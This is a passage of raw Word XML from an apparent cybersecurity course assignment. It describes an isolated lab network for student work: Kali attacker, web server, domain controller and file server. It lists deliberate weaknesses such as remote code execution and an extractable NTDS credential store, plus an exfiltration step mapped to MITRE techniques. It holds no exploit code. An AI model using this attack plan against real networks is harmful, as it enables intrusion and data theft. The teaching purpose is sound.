              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20A25C32" w14:textId="5602FA2F" w:rsidR="0008259B" w:rsidRPr="00796916" w:rsidRDefault="0008259B" w:rsidP="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Access and Exfiltrate sample data on VM-3 (Exploit C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="951" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FB7B6AC" w14:textId="77777777" w:rsidR="0008259B" w:rsidRPr="00796916" w:rsidRDefault="0008259B" w:rsidP="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1039 / T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="15E79A10" w14:textId="479C22D2" w:rsidR="0008259B" w:rsidRPr="00796916" w:rsidRDefault="0008259B" w:rsidP="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sample customer record exfiltrated to attacker host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42190FF6" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc234776726"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.3 Lab Environment Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5470C6F0" w14:textId="77777777" w:rsidR="00CA5DC1" w:rsidRPr="00796916" w:rsidRDefault="00CA5DC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The lab consists of three virtual machines on an isolated host-only network (no route to the internet or any other network) and a Kali Linux attacker VM. This is a conceptual network diagram that should be replicated in Packet Tracer, GNS3 or equivalent and submitted to the Moodle artifact link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E5C6BC" w14:textId="047F83AA" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00CA5DC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Topology (Host-only subnet 10.10.10.0/24) Attacker (Kali, 10.10.10.5) → Switch → {VM-2 web server 10.10.10.20 (DMZ facing)} → internal segment → {VM-1 domain controller 10.10.10.10, VM-3 client/file server 10.10.10.30} The attacker is able to contact VM-2, but not VM-1 or VM-3 until the VM-2 foothold is obtained, similar to a segmented, but inadequately isolated, corporate network.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="704"/>
        <w:gridCol w:w="2383"/>
        <w:gridCol w:w="2744"/>
        <w:gridCol w:w="3529"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="12F0C535" w14:textId="77777777" w:rsidTr="00CA5DC1">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51060704" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6F4813DE" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2744" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B2F2FAC" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OS / stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C44B56D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Deliberate weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="049FFFD4" w14:textId="77777777" w:rsidTr="00CA5DC1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39CA34FB" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1D5F59E7" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Active Directory Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2744" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E08A8CA" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows Server (AD DS, DNS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D403E39" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Weak service-account privileges; extractable NTDS credential store</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="5E41220B" w14:textId="77777777" w:rsidTr="00CA5DC1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="092629CE" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="181E89BF" w14:textId="1CF0FEFB" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Web </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">server </w:t>
            </w:r>
            <w:r w:rsidR="00CA5DC1" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00CA5DC1" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>facing the outside)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2744" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="669729EB" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Linux + vulnerable CMS/web app (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VulnHub</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> image)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="50300BCA" w14:textId="772DA977" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unpatched web application </w:t>
            </w:r>
            <w:r w:rsidR="00CA5DC1" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">allowing </w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>remote code execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="61F42000" w14:textId="77777777" w:rsidTr="00CA5DC1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="03C3DBCA" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0BD3750E" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
